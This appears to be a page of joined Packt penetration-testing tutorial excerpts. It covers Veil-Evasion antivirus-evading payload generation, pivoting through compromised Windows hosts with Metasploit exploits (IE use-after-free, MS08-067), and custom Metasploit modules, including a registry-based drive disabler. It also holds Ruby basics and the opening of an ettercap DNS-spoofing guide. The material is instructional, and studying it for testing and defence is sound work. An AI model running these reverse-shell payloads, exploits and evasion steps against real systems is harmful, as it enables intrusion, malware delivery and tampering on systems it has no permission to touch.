Sources show that Apple's iOS is a close second (http://www.forbes.com/sites/tonybradley/2013/11/15/android-dominates-market-share-but-apple-makes-all-the-money/). Android has been developed by Google as an open and free option for hardware manufacturers and phone carriers. This makes Android the software of choice for companies that require a low-cost, customizable, lightweight operating system for their smart devices without developing a new OS from scratch. Android's open nature has further encouraged developers to build a large number of applications and upload them onto Android Market. Later, end users can download the applications from Android Market, which makes Android a powerful operating system.

iOS

iOS, formerly known as the iPhone operating system, is a mobile operating system developed and distributed solely by Apple Inc. iOS is evolving into a universal operating system for all Apple mobile devices, such as the iPad, iPod touch, and iPhone. iOS is derived from OS X, with which it shares the Darwin foundation, and is therefore a Unix-like operating system. iOS manages the device hardware and provides the technologies required to implement native applications. iOS also ships with various system applications, such as Mail and Safari, which provide standard system services to the user. iOS native applications are distributed through the App Store, which is closely monitored by Apple.

Windows Phone

Windows Phone is a proprietary mobile operating system developed by Microsoft for smartphones and pocket PCs. It is the successor to Windows Mobile and is primarily aimed at the consumer market rather than the enterprise market. The Windows Phone OS is similar to the Windows desktop OS, but it is optimized for devices with a small amount of storage.

BlackBerry OS

BlackBerry OS is a proprietary mobile operating system developed by BlackBerry Ltd., formerly known as Research in Motion (RIM), exclusively for its BlackBerry line of smartphones and mobile devices. BlackBerry mobiles are widely used in corporate environments and offer native support for corporate mail via MIDP, which enables wireless sync with Microsoft Exchange e-mail, contacts, calendar, and so on, while used along with the BlackBerry Enterprise Server. These devices are known for their security.
Veil-Evasion

Packt
18 Jun 2014
6 min read
(For more resources related to this topic, see here.)

A new AV-evasion framework, written by Chris Truncer, called Veil-Evasion (www.Veil-Evasion.com), is now providing effective protection against the detection of standalone exploits. Veil-Evasion aggregates various shellcode injection techniques into a framework that simplifies management. As a framework, Veil-Evasion possesses several features, which include the following:

It incorporates custom shellcode in a variety of programming languages, including C, C#, and Python
It can use Metasploit-generated shellcode
It can integrate third-party tools such as Hyperion (which encrypts an EXE file with AES-128 bit encryption), PEScrambler, and BackDoor Factory
The Veil-Evasion_evasion.cna script allows Veil-Evasion to be integrated into Armitage and its commercial version, Cobalt Strike
Payloads can be generated and seamlessly substituted into all PsExec calls
Users have the ability to reuse shellcode or implement their own encryption methods
Its functionality can be scripted to automate deployment
Veil-Evasion is under constant development, and the framework has been extended with modules such as Veil-Evasion-Catapult (the payload delivery system)

Veil-Evasion can generate an exploit payload; the standalone payloads include the following options:

A minimal Python installation to invoke shellcode; it uploads a minimal Python.zip installation and the 7zip binary. The Python environment is unzipped, invoking the shellcode. Since the only files that interact with the victim are trusted Python libraries and the interpreter, the victim's AV does not detect or alarm on any unusual activity.
The sethc backdoor, which configures the victim's registry to launch the sticky keys RDP backdoor.
A PowerShell shellcode injector.

When the payloads have been created, they can be delivered to the target in one of the following two ways:

Upload and execute using Impacket and the PTH toolkit
UNC invocation

Veil-Evasion is available from the Kali repositories and is automatically installed by simply entering apt-get install veil-evasion in a command prompt. If you receive any errors during installation, re-run the /usr/share/veil-evasion/setup/setup.sh script.

Veil-Evasion presents the user with the main menu, which shows the number of payload modules that are loaded as well as the available commands. Typing list will list all available payloads, list langs will list the available language payloads, and list <language> will list the payloads for a specific language. Veil-Evasion's initial launch screen is shown in the following screenshot:

Veil-Evasion is undergoing rapid development, with significant releases on a monthly basis and important upgrades occurring more frequently. Presently, there are 24 payloads designed to bypass antivirus by employing encryption or direct injection into the memory space. These payloads are shown in the next screenshot:

To obtain information on a specific payload, type info <payload number / payload name> or info <tab> to autocomplete the payloads that are available. You can also just enter the number from the list. In the following example, we entered 19 to select the python/shellcode_inject/aes_encrypt payload:

The exploit includes an expire_payload option. If the module is not executed by the target user within a specified timeframe, it is rendered inoperable. This function contributes to the stealthiness of the attack.
For any payload, the required options are listed with their names, default values, and descriptions. If a required value isn't completed by default, the tester will need to input a value before the payload can be generated. To set the value for an option, enter set <option name> and then type the desired value. To accept the default options and create the exploit, type generate in the command prompt.

If the payload uses shellcode, you will be presented with the shellcode menu, where you can select msfvenom (the default shellcode) or a custom shellcode. If the custom shellcode option is selected, enter the shellcode in the form of \x01\x02, without quotes and newlines (\n). If the default msfvenom is selected, you will be prompted with the default payload choice of windows/meterpreter/reverse_tcp. If you wish to use another payload, press Tab to complete the available payloads. The available payloads are shown in the following screenshot:

In the following example, the [tab] command was used to demonstrate some of the available payloads; however, the default (windows/meterpreter/reverse_tcp) was selected, as shown in the following screenshot:

The user will then be presented with the output menu and a prompt to choose the base name for the generated payload files. If the payload was Python-based and you selected compile_to_exe as an option, you will have the option of either using Pyinstaller to create the EXE file or generating Py2Exe files, as shown in the following screenshot:

The final screen displays information on the generated payload, as shown in the following screenshot:

The exploit could also have been created directly from the command line using the following options:

kali@linux:~$ ./Veil-Evasion.py -p python/shellcode_inject/aes_encrypt -o output --msfpayload windows/meterpreter/reverse_tcp --msfoptions LHOST=192.168.43.134 LPORT=4444

Once an exploit has been created, the tester should verify the payload against VirusTotal to ensure that it will not trigger an alert when it is placed on the target system. If the payload sample is submitted directly to VirusTotal and its behavior flags it as malicious software, then a signature update against the submission can be released by antivirus (AV) vendors in as little as one hour. This is why users are clearly admonished with the message "don't submit samples to any online scanner!"

Veil-Evasion allows testers to run a safe check against VirusTotal instead. When any payload is created, a SHA1 hash is generated and added to hashes.txt, located in the ~/veil-output directory. Testers can invoke the checkvt script to submit the hashes to VirusTotal, which will check the SHA1 hash values against its malware database. If a Veil-Evasion payload triggers a match, then the tester knows that it may be detected by the target system. If it does not trigger a match, then the exploit payload should bypass the antivirus software. A successful lookup (not detectable by AV) using the checkvt command is shown as follows:

Testing thus far supports the finding that if checkvt does not find a match on VirusTotal, the payload will not be detected by the target's antivirus software. To use the payload with the Metasploit Framework, use exploit/multi/handler and set PAYLOAD to windows/meterpreter/reverse_tcp (the same as the Veil-Evasion payload option), with the same LHOST and LPORT used with Veil-Evasion. When the listener is functional, send the exploit to the target system. When the target launches it, a reverse shell will be established back to the attacker's system.
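As a sketch of that handler setup in msfconsole (the LHOST and LPORT values simply mirror the ones used when the payload was generated above):

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.43.134
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit -j

The -j flag runs the handler as a background job, so the console stays free while waiting for the victim to launch the payload.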
Summary

Kali provides several tools to facilitate the development, selection, and activation of exploits, including the internal exploit-db database as well as several frameworks that simplify the use and management of exploits. Among these frameworks, the Metasploit Framework and Armitage are particularly important; however, Veil-Evasion enhances both with its ability to bypass antivirus detection.

Resources for Article:

Further resources on this subject:
- Kali Linux – Wireless Attacks [Article]
- Web app penetration testing in Kali [Article]
- Customizing a Linux kernel [Article]


Using the client as a pivot point

Packt
17 Jun 2014
6 min read
Pivoting

To set our potential pivot point, we first need to exploit a machine. Then we need to check for a second network card in the machine that is connected to another network, which we cannot reach without using the machine that we exploit. As an example, we will use three machines, with the Kali Linux machine as the attacker, a Windows XP machine as the first victim, and a Windows Server 2003 machine as the second victim. The scenario is that we get a client to go to our malicious site, and we use a use-after-free exploit against Microsoft Internet Explorer. This type of vulnerability has continued to plague the product for a number of revisions. An example of this is shown in the following screenshot from the Exploit DB website:

The exploit listed at the top of the list is one that is against Internet Explorer 9. As an example, we will target the exploit that is against Internet Explorer 8; the concept of the attack is the same. In simple terms, Internet Explorer developers continue to make the mistake of not cleaning up memory after it is allocated.

Start up your Metasploit tool by entering msfconsole. Once the console has come up, enter search cve-2013-1347 to search for the exploit. An example of the results of the search is shown in the following screenshot:

One concern is that it is rated as good, but we like to find ratings of excellent or better when we select our exploits. For our purposes, we will see whether we can make it work. Of course, there is always a chance we will not find what we need and have to make the choice to either write our own exploit or document it and move on with the testing.

For the example we use here, the Kali machine is 192.168.177.170, and it is what we set our LHOST to. For your purposes, you will have to use the Kali address that you have. We will enter the following commands in the Metasploit window:

use exploit/windows/browser/ie_cgenericelement_uaf
set SRVHOST 192.168.177.170
set LHOST 192.168.177.170
set PAYLOAD windows/meterpreter/reverse_tcp
exploit

An example of the results of the preceding commands is shown in the following screenshot:

As the previous screenshot shows, we now have the URL that we need to get the user to access. For our purposes, we will just copy and paste it into Internet Explorer 8, which is running on the Windows XP Service Pack 3 machine. Once we have pasted it, we may need to refresh the browser a couple of times to get the payload to work; however, in real life, we get just one chance, so select your exploits carefully so that one click by the victim does the intended work. Hence, to be a successful tester, a lot of practice and knowledge about the various exploits is of the utmost importance. An example of what you should see once the exploit is complete and your session is created is shown in the following screenshot:

We now have a shell on the machine, and we want to check whether it is dual-homed. In the Meterpreter shell, enter ipconfig to see whether the machine you have exploited has a second network card. An example of the machine we exploited is shown in the following screenshot:

As the previous screenshot shows, we are in luck. We have a second network card connected and another network for us to explore, so let us do that now. The first thing we have to do is set the shell up to route to our newly found network.
This is another reason why we chose the Meterpreter shell; it provides us with the capability to set the route up. In the shell, enter run autoroute -s 10.2.0.0/24 to set up a route to our 10 network. Once the command is complete, enter run autoroute -p to display the routing table. An example of this is shown in the following screenshot:

As the previous screenshot shows, we now have a route to our 10 network via session 1. So, now it is time to see what is on our 10 network. Next, we will background session 1; press Ctrl + Z to do so. We will use the scan capability from within our Metasploit tool. Enter the following commands:

use auxiliary/scanner/portscan/tcp
set RHOSTS 10.2.0.0/24
set PORTS 139,445
set THREADS 50
run

The port scanner is not very efficient, and the scan will take some time to complete. You can elect to use the Nmap scanner directly in Metasploit instead; enter nmap -sP 10.2.0.0/24. Once you have identified the live systems, conduct the scanning methodology against the targets. For our example here, we have our target located at 10.2.0.149. An example of the results for this scan is shown in the following screenshot:

We now have a target, and we could use a number of methods we covered earlier against it. For our purposes here, we will see whether we can exploit the target using the famous MS08-067 Server Service buffer overflow. In the Metasploit window, set the session in the background and enter the following commands:

use exploit/windows/smb/ms08_067_netapi
set RHOST 10.2.0.149
set PAYLOAD windows/meterpreter/bind_tcp
exploit

If all goes well, you should see a shell open on the machine. When it does, enter ipconfig to view the network configuration on the machine. From here, it is just a matter of carrying out the process that we followed before, and if you find another dual-homed machine, then you can make another pivot and continue. An example of the results is shown in the following screenshot:

As the previous screenshot shows, the pivot was successful, and we now have another session open within Metasploit. This is reflected with the Local Pipe | Remote Pipe reference. Once you complete reviewing the information, enter sessions to display the information for the sessions. An example of this result is shown in the following screenshot:

Summary

In this article, we looked at the powerful technique of establishing a pivot point from a client.

Resources for Article:

Further resources on this subject:
- Installation of Oracle VM VirtualBox on Linux [article]
- Using Virtual Destinations (Advanced) [article]
- Quick Start into Selenium Tests [article]


Metasploit Custom Modules and Meterpreter Scripting

Packt
03 Jun 2014
10 min read
(For more resources related to this topic, see here.)

Writing out a custom FTP scanner module

Let's try and build a simple module. We will write a simple FTP fingerprinting module and see how things work. Let's examine the code for the FTP module:

require 'msf/core'
class Metasploit3 < Msf::Auxiliary
  include Msf::Exploit::Remote::Ftp
  include Msf::Auxiliary::Scanner

  def initialize
    super(
      'Name'        => 'Apex FTP Detector',
      'Description' => '1.0',
      'Author'      => 'Nipun Jaswal',
      'License'     => MSF_LICENSE
    )
    register_options(
      [
        Opt::RPORT(21),
      ], self.class)
  end

We start our code by defining the required libraries to refer to. We define the statement require 'msf/core' to include the path to the core libraries at the very first step. Then, we define what kind of module we are creating; in this case, we are writing an auxiliary module, exactly the way we did for the previous module. Next, we define the library files we need to include from the core library set. Here, the include Msf::Exploit::Remote::Ftp statement refers to the /lib/msf/core/exploit/ftp.rb file, and include Msf::Auxiliary::Scanner refers to the /lib/msf/core/auxiliary/scanner.rb file. We have already discussed the scanner.rb file in detail in the previous example. However, the ftp.rb file contains all the necessary methods related to FTP, such as methods for setting up a connection, logging in to the FTP service, sending an FTP command, and so on.

Next, we define the information of the module we are writing and attributes such as name, description, author name, and license in the initialize method. We also define what options are required for the module to work. For example, here we assign RPORT to port 21 by default. Let's continue with the remaining part of the module:

  def run_host(target_host)
    connect(true, false)
    if(banner)
      print_status("#{rhost} is running #{banner}")
    end
    disconnect
  end
end

We define the run_host method, which will initiate the process of connecting to the target by overriding the run_host method from the /lib/msf/core/auxiliary/scanner.rb file. Similarly, we use the connect function from the /lib/msf/core/exploit/ftp.rb file, which is responsible for initializing a connection to the host. We supply two parameters to the connect function: true and false. The true parameter defines the use of global parameters, whereas false turns off the verbose capabilities of the module. The beauty of the connect function lies in its operation of connecting to the target and automatically recording the banner of the FTP service in the parameter named banner, as shown in the following screenshot:

Now we know that the result is stored in the banner attribute. Therefore, we simply print out the banner at the end, and we disconnect the connection to the target.

This was an easy module, and I recommend that you try building simple scanners and other modules like these. Nevertheless, before we run this module, let's check whether the module we just built is correct with regard to its syntax. We can do this by passing the module through an in-built Metasploit tool named msftidy, as shown in the following screenshot:

We will get a warning message indicating that there are a few extra spaces at the end of line number 19. Therefore, when we remove the extra spaces and rerun msftidy, we will see that no error is generated. This marks the syntax of the module as correct.
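Before the module can be used, Metasploit has to be able to find it. The original text doesn't show where the file was saved; one common approach, assumed here along with the ftp_detector.rb filename and the RHOSTS value, is to place it under the user module tree and load it from msfconsole:

mkdir -p ~/.msf4/modules/auxiliary/scanner/ftp
cp ftp_detector.rb ~/.msf4/modules/auxiliary/scanner/ftp/
msfconsole
msf > use auxiliary/scanner/ftp/ftp_detector
msf auxiliary(ftp_detector) > set RHOSTS 192.168.10.111
msf auxiliary(ftp_detector) > run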
Now, let's run this module and see what we gather:

We can see that the module ran successfully, and it has the banner of the service running on port 21, which is Baby FTP Server. For further reading on the acceptance of modules in the Metasploit project, refer to https://github.com/rapid7/metasploit-framework/wiki/Guidelines-for-Accepting-Modules-and-Enhancements.

Writing out a custom HTTP server scanner

Now, let's take a step further into development and fabricate something a bit trickier. We will create a simple fingerprinter for HTTP services, but with a slightly more complex approach. We will name this file http_myscan.rb, as shown in the following code snippet:

require 'rex/proto/http'
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner

  def initialize
    super(
      'Name'        => 'Server Service Detector',
      'Description' => 'Detects Service On Web Server, Uses GET to Pull Out Information',
      'Author'      => 'Nipun_Jaswal',
      'License'     => MSF_LICENSE
    )
  end

We include all the necessary library files as we did for the previous modules. We also assign general information about the module in the initialize method, as shown in the following code snippet:

  def os_fingerprint(response)
    if not response.headers.has_key?('Server')
      return "Unknown OS (No Server Header)"
    end
    case response.headers['Server']
    when /Win32/, /\(Windows/, /IIS/
      os = "Windows"
    when /Apache\//
      os = "*Nix"
    else
      os = "Unknown Server Header Reporting: " + response.headers['Server']
    end
    return os
  end

  def pb_fingerprint(response)
    if not response.headers.has_key?('X-Powered-By')
      resp = "No-Response"
    else
      resp = response.headers['X-Powered-By']
    end
    return resp
  end

  def run_host(ip)
    connect
    res = send_request_raw({'uri' => '/', 'method' => 'GET' })
    return if not res
    os_info = os_fingerprint(res)
    pb = pb_fingerprint(res)
    fp = http_fingerprint(res)
    print_status("#{ip}:#{rport} is running #{fp} version And Is Powered By: #{pb} Running On #{os_info}")
  end
end

The preceding module is similar to the one we discussed in the very first example. We have the run_host method here with ip as a parameter, which will open a connection to the host. Next, we have send_request_raw, which will fetch the response from the website or web server at / with a GET request. The result fetched will be stored in the variable named res.

We pass the value of the response in res to the os_fingerprint method. This method will check whether the response has the Server key in the header; if the Server key is not present, we will be presented with a message saying Unknown OS. However, if the response header has the Server key, we match it against a variety of values using regex expressions. If a match is made, the corresponding value of os is sent back to the calling definition, which is the os_info parameter.

Now, we will check which technology is running on the server. We will create a similar function, pb_fingerprint, but it will look for the X-Powered-By key rather than Server. Similarly, we will check whether this key is present in the response or not. If the key is not present, the method will return No-Response; if it is present, the value of X-Powered-By is returned to the calling method and gets stored in a variable, pb. Next, we use the http_fingerprint method that we used in the previous examples as well and store its result in a variable, fp. We simply print out the values returned from os_fingerprint, pb_fingerprint, and http_fingerprint using their corresponding variables.
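Before running the module, the Server-header matching logic can be sanity-checked on its own in irb; the header string below is a made-up example value:

header = "Microsoft-IIS/7.5"
os = case header
     when /Win32/, /\(Windows/, /IIS/ then "Windows"
     when /Apache\// then "*Nix"
     else "Unknown Server Header Reporting: " + header
     end
puts os    # prints "Windows"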
Let's see what output we'll get after running this module:

msf auxiliary(http_myscan) > run
[*] 192.168.75.130:80 is running Microsoft-IIS/7.5 version And Is Powered By: ASP.NET Running On Windows
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Writing out post-exploitation modules

Now, as we have seen the basics of module building, we can take a step further and try to build a post-exploitation module. A point to remember here is that we can only run a post-exploitation module after a target has been compromised successfully. So, let's begin with a simple drive disabler module, which will disable C: at the target system:

require 'msf/core'
require 'rex'
require 'msf/core/post/windows/registry'
class Metasploit3 < Msf::Post
  include Msf::Post::Windows::Registry

  def initialize
    super(
      'Name'        => 'Drive Disabler Module',
      'Description' => 'C Drive Disabler Module',
      'License'     => MSF_LICENSE,
      'Author'      => 'Nipun Jaswal'
    )
  end

We started in the same way as we did in the previous modules. We have added the path to all the required libraries we need in this post-exploitation module. However, we have added include Msf::Post::Windows::Registry on the 5th line of the preceding code, which refers to the /core/post/windows/registry.rb file. This will give us the power to use registry manipulation functions with ease using Ruby mixins. Next, we define the type of module and the intended version of Metasploit. In this case, it is Post for post-exploitation, and Metasploit3 is the intended version. We include the same file again because this is a single file and not a separate directory. Next, we define the necessary information about the module in the initialize method, just as we did for the previous modules. Let's see the remaining part of the module:

  def run
    key1 = "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\"
    print_line("Disabling C Drive")
    meterpreter_registry_setvaldata(key1,'NoDrives','4','REG_DWORD')
    print_line("Setting No Drives For C")
    meterpreter_registry_setvaldata(key1,'NoViewOnDrives','4','REG_DWORD')
    print_line("Removing View On The Drive")
    print_line("Disabled C Drive")
  end
end #class

We created a variable called key1, and we stored in it the path of the registry where we need to create values to disable the drives. As we are in a Meterpreter shell after the exploitation has taken place, we will use the meterpreter_registry_setvaldata function from the /core/post/windows/registry.rb file to create a registry value at the path defined by key1.

This operation will create a new registry value named NoDrives of the REG_DWORD type at the path defined by key1. However, you might be wondering why we have supplied 4 as the bitmask. To calculate the bitmask for a particular drive, we have a little formula: 2^(n-1), where n is the drive character's serial number in the alphabet. Suppose we need to disable the C drive. We know that the character C is the third character in the alphabet. Therefore, we can calculate the exact bitmask value for disabling the C drive as follows:

2^(3-1) = 2^2 = 4

Therefore, the bitmask is 4 for disabling C:. We also created another value, NoViewOnDrives, to disable the view of these drives, with the exact same parameters.

Now, when we run this module, it gives the following output:

So, let's see whether we have successfully disabled C: or not:

Bingo! No C:. We successfully disabled C: from the user's view. Therefore, we can create as many post-exploitation modules as we want according to our needs. I recommend you put some extra time toward the libraries of Metasploit.
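As a quick aside, the bitmask formula is easy to verify in irb with a small helper; this sketch is illustrative and not part of the module:

# 2^(n-1), where n is the drive letter's position in the alphabet
def drive_bitmask(letter)
  2 ** (letter.upcase.ord - 'A'.ord)
end

puts drive_bitmask('C')                        # => 4
puts drive_bitmask('A')                        # => 1
puts drive_bitmask('C') | drive_bitmask('D')   # => 12, masks can be OR-ed to hide several drives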
Make sure you have user-level access rather than SYSTEM for the preceding script to work, as SYSTEM privileges will not create the registry values under HKCU, since that hive belongs to the logged-on user. In addition to this, we have used HKCU instead of writing HKEY_CURRENT_USER because of the inbuilt normalization that will automatically create the full form of the key. I recommend you check the registry.rb file to see the various available methods.

Ruby and Metasploit Modules

Packt
23 May 2014
11 min read
(For more resources related to this topic, see here.)

Reinventing Metasploit

Consider a scenario where the systems under the scope of the penetration test are very large in number, and we need to perform a post-exploitation function such as downloading a particular file from all the systems after exploiting them. Downloading a particular file from each system manually will consume a lot of time and will be tiring as well. Therefore, in a scenario like this, we can create a custom post-exploitation script that will automatically download a file from all the systems that are compromised.

This article focuses on building programming skill sets for Metasploit modules. It kicks off with the basics of Ruby programming and ends with developing various Metasploit modules. In this article, we will cover the following points:

- Understanding the basics of Ruby programming
- Writing programs in Ruby programming
- Exploring modules in Metasploit
- Writing your own modules and post-exploitation modules

Let's now understand the basics of Ruby programming and gather the required essentials we need to code Metasploit modules. Before we delve deeper into coding Metasploit modules, we must know the core features of Ruby programming that are required in order to design these modules. However, why do we require Ruby for Metasploit? The following key points will help us understand the answer to this question:

- Constructing an automated class for reusable code is a feature of the Ruby language that matches the needs of Metasploit
- Ruby is an object-oriented style of programming
- Ruby is an interpreter-based language that is fast and consumes less development time
- Perl, which was used earlier, did not support code reuse

Ruby – the heart of Metasploit

Ruby is indeed the heart of the Metasploit framework. However, what exactly is Ruby? According to the official website, Ruby is a simple and powerful programming language. Yukihiro Matsumoto designed it in 1995. It is further defined as a dynamic, reflective, and general-purpose object-oriented programming language with functions similar to Perl.

You can download Ruby for Windows/Linux from http://rubyinstaller.org/downloads/. You can refer to an excellent resource for learning Ruby practically at http://tryruby.org/levels/1/challenges/0.

Creating your first Ruby program

Ruby is an easy-to-learn programming language. Now, let's start with the basics of Ruby. However, remember that Ruby is a vast programming language. Covering all the capabilities of Ruby would push us beyond the scope of this article. Therefore, we will only stick to the essentials that are required in designing Metasploit modules.

Interacting with the Ruby shell

Ruby offers an interactive shell too. Working on the interactive shell will help us understand the basics of Ruby clearly. So, let's get started. Open your CMD/terminal and type irb in it to launch the Ruby interactive shell. Let's input something into the Ruby shell and see what happens; suppose I type in the number 2 as follows:

irb(main):001:0> 2
=> 2

The shell throws back the value. Now, let's give another input, such as an addition operation, as follows:

irb(main):002:0> 2+3
=> 5

We can see that if we input numbers using an expression style, the shell gives us back the result of the expression.
Let's perform some functions on strings, such as storing the value of a string in a variable, as follows:

irb(main):005:0> a= "nipun"
=> "nipun"
irb(main):006:0> b= "loves metasploit"
=> "loves metasploit"

After assigning values to the variables a and b, let's see what the shell response will be when we type a and a+b on the shell's console:

irb(main):014:0> a
=> "nipun"
irb(main):015:0> a+b
=> "nipunloves metasploit"

We can see that when we typed in a as an input, it reflected the value stored in the variable named a. Similarly, a+b gave us back the concatenated result of variables a and b.

Defining methods in the shell

A method or function is a set of statements that will execute when we make a call to it. We can declare methods easily in Ruby's interactive shell, or we can declare them using a script as well. Methods are an important aspect when working with Metasploit modules. Let's see the syntax:

def method_name [( [arg [= default]]...[, * arg [, &expr ]])]
expr
end

To define a method, we use def followed by the method name, with arguments and expressions in parentheses. We also use an end statement following all the expressions to set an end to the method definition. Here, arg refers to the arguments that a method receives. In addition, expr refers to the expressions that a method receives or calculates inline. Let's have a look at an example:

irb(main):001:0> def week2day(week)
irb(main):002:1> week=week*7
irb(main):003:1> puts(week)
irb(main):004:1> end
=> nil

We defined a method named week2day that receives an argument named week. Furthermore, we multiplied the received argument by 7 and printed out the result using the puts function. Let's call this function with 4 as the value of the argument:

irb(main):005:0> week2day(4)
28
=> nil

We can see our function printing out the correct value by performing the multiplication operation. Ruby offers two different functions to print the output: puts and print. However, when it comes to the Metasploit framework, the print_line function is used.

Variables and data types in Ruby

A variable is a placeholder for values that can change at any given time. In Ruby, we declare a variable only when we need to use it. Ruby supports numerous variable data types, but we will only discuss those that are relevant to Metasploit. Let's see what they are.

Working with strings

Strings are objects that represent a stream or sequence of characters. In Ruby, we can assign a string value to a variable with ease, as seen in the previous example. By simply defining the value in double quotation marks or a single quotation mark, we can assign a value to a string.

It is recommended to use double quotation marks, because single quotations can create problems. Let's have a look at the problem that may arise:

irb(main):005:0> name = 'Msf Book'
=> "Msf Book"
irb(main):006:0> name = 'Msf's Book'
irb(main):007:0' '

We can see that when we used a single quotation mark, it worked. However, when we tried to put Msf's instead of the value Msf, an error occurred. This is because the shell read the single quotation mark in the Msf's string as the end of single quotations, which is not the case; this situation caused a syntax-based error.

The split function

We can split the value of a string into a number of consecutive variables using the split function.
Let's have a look at a quick example that demonstrates this:

irb(main):011:0> name = "nipun jaswal"
=> "nipun jaswal"
irb(main):012:0> name,surname=name.split(' ')
=> ["nipun", "jaswal"]
irb(main):013:0> name
=> "nipun"
irb(main):014:0> surname
=> "jaswal"

Here, we have split the value of the entire string into two consecutive strings, name and surname, by using the split function. The function split the entire string into two strings by considering the space to be the split position.

The squeeze function

The squeeze function removes runs of repeated characters, such as extra spaces, from a given string, as shown in the following code snippet:

irb(main):016:0> name = "Nipun  Jaswal"
=> "Nipun  Jaswal"
irb(main):017:0> name.squeeze
=> "Nipun Jaswal"

Numbers and conversions in Ruby

We can use numbers directly in arithmetic operations. However, remember to convert a string into an integer when working on user input using the .to_i function. Simultaneously, we can convert an integer into a string using the .to_s function. Let's have a look at some quick examples and their output:

irb(main):006:0> b="55"
=> "55"
irb(main):007:0> b+10
TypeError: no implicit conversion of Fixnum into String
from (irb):7:in `+'
from (irb):7
from C:/Ruby200/bin/irb:12:in `<main>'
irb(main):008:0> b.to_i+10
=> 65
irb(main):009:0> a=10
=> 10
irb(main):010:0> b="hello"
=> "hello"
irb(main):011:0> a+b
TypeError: String can't be coerced into Fixnum
from (irb):11:in `+'
from (irb):11
from C:/Ruby200/bin/irb:12:in `<main>'
irb(main):012:0> a.to_s+b
=> "10hello"

We can see that when we assigned a value to b in quotation marks, it was considered a string, and an error was generated while performing the addition operation. Nevertheless, as soon as we used the to_i function, it converted the value from a string into an integer variable, and the addition was performed successfully. Similarly, with regard to strings, when we tried to concatenate an integer with a string, an error showed up. However, after the conversion, it worked.

Ranges in Ruby

Ranges are important aspects and are widely used in auxiliary modules such as scanners and fuzzers in Metasploit. Let's define a range and look at the various operations we can perform on this data type:

irb(main):028:0> zero_to_nine= 0..9
=> 0..9
irb(main):031:0> zero_to_nine.include?(4)
=> true
irb(main):032:0> zero_to_nine.include?(11)
=> false
irb(main):002:0> zero_to_nine.each{|zero_to_nine| print(zero_to_nine)}
0123456789=> 0..9
irb(main):003:0> zero_to_nine.min
=> 0
irb(main):004:0> zero_to_nine.max
=> 9

We can see that a range offers various operations, such as searching, finding the minimum and maximum values, and displaying all the data in a range. Here, the include? function checks whether the value is contained in the range or not. In addition, the min and max functions display the lowest and highest values in a range.

Arrays in Ruby

We can simply define arrays as a list of various values. Let's have a look at an example:

irb(main):005:0> name = ["nipun","james"]
=> ["nipun", "james"]
irb(main):006:0> name[0]
=> "nipun"
irb(main):007:0> name[1]
=> "james"

So, up to this point, we have covered all the required variables and data types that we will need for writing Metasploit modules.
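Since ranges show up constantly in scanner modules, here is a small standalone sketch of a range driving a TCP port sweep; the host and port range are made-up values:

require 'socket'
require 'timeout'

host = "192.168.10.103"   # hypothetical target
(20..25).each do |port|
  begin
    # Treat a completed connection within one second as an open port
    Timeout.timeout(1) { TCPSocket.new(host, port).close }
    puts "#{host}:#{port} is open"
  rescue Timeout::Error, Errno::ECONNREFUSED, Errno::EHOSTUNREACH
    # closed, filtered, or unreachable; move on to the next port
  end
end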
For more information on variables and data types, refer to the following link: http://www.tutorialspoint.com/ruby/

Refer to a quick cheat sheet for using Ruby programming effectively at the following links:

- https://github.com/savini/cheatsheets/raw/master/ruby/RubyCheat.pdf
- http://hyperpolyglot.org/scripting

Methods in Ruby

A method is another name for a function. Programmers with a background other than Ruby might use these terms interchangeably. A method is a subroutine that performs a specific operation. The use of methods implements the reuse of code and decreases the length of programs significantly. Defining a method is easy: the definition starts with the def keyword and ends with the end statement. Let's consider a simple program to understand how they work, for example, printing out the square of 50:

def print_data(par1)
square = par1*par1
return square
end

answer = print_data(50)
print(answer)

The print_data method receives the parameter sent from the main code, multiplies it by itself, and sends it back using the return statement. The program saves this returned value in a variable named answer and prints the value.

Decision-making operators

Decision making is also a simple concept, as with any other programming language. Let's have a look at an example:

irb(main):001:0> 1 > 2
=> false
irb(main):002:0> 1 < 2
=> true

Let's also consider the case of string data:

irb(main):005:0> "Nipun" == "nipun"
=> false
irb(main):006:0> "Nipun" == "Nipun"
=> true

Let's consider a simple program with decision-making operators:

#Function
def decision(par1)
print(par1)
if(par1%2==0)
print("Number is Even")
else
print("Number is Odd")
end
end

#Main
num = gets
num1 = num.to_i
decision(num1)

Note that the method is defined before the main code calls it; at the top level of a Ruby script, a method must be defined before the first call to it. We ask the user to enter a number and store it in a variable named num using gets. However, gets will save the user input in the form of a string. So, let's first change its data type to an integer using the to_i method and store it in a different variable named num1. Next, we pass this value as an argument to the method named decision and check whether the number is divisible by two. If the remainder is equal to zero, the number is even, which is why the if block is executed; if the condition is not met, the else block is executed. The output of the preceding program will be something similar to the following screenshot when executed in a Windows-based environment:
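For reference, assuming the script is saved as decision.rb, a run with an input of 4 would look roughly like the following; note that print does not append newlines, so the echoed input and the message run together:

C:\> ruby decision.rb
4
4Number is Even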


Network Exploitation and Monitoring

Packt
22 May 2014
8 min read
(For more resources related to this topic, see here.)

Man-in-the-middle attacks

Using ARP abuse, we can perform more elaborate man-in-the-middle (MITM)-style attacks, building on the ability to abuse address resolution and host identification schemes. This section will focus on the methods you can use to do just that.

MITM attacks are aimed at fooling two entities on a given network into communicating through the proxy of an unauthorized third party, or at allowing that third party to access information in transit between the two entities. For instance, when a victim connects to a service on the local network or on a remote network, a man-in-the-middle attack will give you as an attacker the ability to eavesdrop on or even augment the communication happening between the victim and its service. By service, we could mean a web (HTTP), FTP, or RDP service, or really anything that doesn't have the inherent means to defend itself against MITM attacks, which turns out to be quite a lot of the services we use today!

Ettercap DNS spoofing

Ettercap is a tool that provides simple command-line and graphical interfaces for performing MITM attacks using a variety of techniques. In this section, we will be focusing on applications of ARP spoofing attacks, namely DNS spoofing. You can set up a DNS spoofing attack with ettercap by performing the following steps:

1. Before we get ettercap up and running, we need to modify the file that holds the DNS records for our soon-to-be-spoofed DNS server. This file is found under /usr/share/ettercap/etter.dns. What you need to do is either add DNS names and IP addresses, or modify the ones currently in the file by replacing all the IPs with yours, if you'd like to act as the intercepting host.

